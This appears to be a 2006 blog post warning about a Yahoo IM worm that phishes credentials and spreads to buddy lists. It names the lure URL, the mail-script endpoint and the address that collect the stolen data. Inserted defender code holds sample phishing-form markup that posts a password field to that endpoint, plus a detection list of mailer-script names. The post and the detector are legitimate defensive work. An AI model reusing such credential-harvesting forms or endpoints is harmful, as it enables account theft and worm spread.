New Yahoo IM Malware/Worm (Mom, how could you!)

Dave G. | June 7th, 2006 | Filed Under: New Findings

So, I log into Yahoo IM today, and I get this from my mother:

:) http://www.geocities.com/lots_of_hot_pics_of_me/ :)

Now, I know my mother. I know she would not send this URL to me. The obvious question is, what if this was meant for someone else (my father, I would hope!). I confirm that, in fact, my mother does not take suggestive pictures and post them on the Internet.

Looks like a piece of malware that:


  1. steals credentials via that geocities URL (DON'T GO THERE)
  2. sends it to: http://www2.fiberbit.net/form/mailto.cgi
  3. which mails it to “slims.box@gmail.com”
  4. redirects the user to their own Yahoo Photos page
  5. logs into Yahoo IM as the unfortunate sap
  6. sends the URL to everyone on their buddy list

I am sure it does more than that. Heads up.
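
A defender-side check for the first two steps in the list above, added here as an example and not part of the original post: it flags any password form whose action posts to a different host than the page serving it, and notes form-to-mail style targets. The sample markup and the `MAILER_HINTS` list are constructed assumptions; only the two URLs come from the post.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Assumption: path fragments typical of generic form-to-mail scripts.
MAILER_HINTS = ("mailto.cgi", "formmail")

class FormAudit(HTMLParser):
    """Collect each <form> with its resolved action and whether it holds a password field."""
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []
        self._open = None  # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # A missing or relative action resolves against the page URL.
            self._open = {"action": urljoin(self.page_url, a.get("action") or ""),
                          "has_password": False}
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            if (a.get("type") or "").lower() == "password":
                self._open["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None

def suspicious_forms(page_url, html):
    """Return findings for password forms that submit to a host other than the page's."""
    audit = FormAudit(page_url)
    audit.feed(html)
    page_host = urlparse(page_url).hostname
    findings = []
    for form in audit.forms:
        target = urlparse(form["action"])
        if form["has_password"] and target.hostname != page_host:
            findings.append({"action": form["action"],
                             "mailer": any(h in target.path.lower() for h in MAILER_HINTS)})
    return findings

# Constructed sample markup, not captured from the real page.
SAMPLE = """<form method="post" action="http://www2.fiberbit.net/form/mailto.cgi">
<input type="text" name="login"><input type="password" name="passwd">
<input type="submit" value="Sign In"></form>
<form action="/search"><input type="text" name="q"></form>"""

if __name__ == "__main__":
    for f in suspicious_forms("http://www.geocities.com/lots_of_hot_pics_of_me/", SAMPLE):
        print(f)
```
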

4 Comments so far

  • Spandau Ballet

    June 8th, 2006 2:08 am

    The geocities URL is no longer in production. I just got a 403 from the server, which means one of two things:

    1) Either the geocities administrators have responded to a potential worm, or…
    2) Dave’s mom knows how to party and should add me to her buddy list.

    I’m really hoping for #2. If she is in the habit of clicking on random porno links, then this actually could be possible.

  • Randy

    September 16th, 2006 10:49 pm

    This is still alive and well. I just got nabbed by it this weekend, so Yahoo and Geocities have done nothing very serious about getting rid of the problem.

  • Dave G.

    September 17th, 2006 11:05 pm

    Randy:

    With the same URLs?

  • anissia

    September 18th, 2006 12:14 pm

    umm, ok.
